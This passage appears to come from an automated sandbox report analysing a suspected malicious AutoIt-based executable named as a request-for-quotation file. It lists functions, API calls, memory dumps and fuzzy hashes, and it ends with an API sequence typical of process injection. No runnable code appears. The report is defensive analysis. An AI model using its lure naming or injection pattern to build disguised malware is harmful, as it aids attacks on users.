                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                        • String ID: @EXITCODE
                                                        • API String ID: 2734553683-3436989551
                                                        • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                        • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                        Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 00410107
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _strcat
                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 1765576173-525010454
                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                        Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                        Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1794320848-0
                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                        Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentTerminate
                                                        • String ID:
                                                        • API String ID: 2429186680-0
                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                        Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_
                                                        • String ID:
                                                        • API String ID: 1144537725-0
                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                        Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 0043214B
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • _malloc.LIBCMT ref: 0043215D
                                                        • _malloc.LIBCMT ref: 0043216F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _malloc$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 680241177-0
                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                        Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 4217535847-0
                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                        Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                        • Opcode Fuzzy Hash: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                        Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__wsplitpath_malloc
                                                        • String ID:
                                                        • API String ID: 4163294574-0
                                                        • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                        • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                        Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                        • _strcat.LIBCMT ref: 0040F786
                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                        • String ID:
                                                        • API String ID: 3199840319-0
                                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                        Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FreeInfoLibraryParametersSystem
                                                        • String ID:
                                                        • API String ID: 3403648963-0
                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                        Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                        Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                        Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00415012
                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2999321469-0
                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                        Function 040B2B8D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040B334B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040B33E1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040B3403
                                                        Memory Dump Source
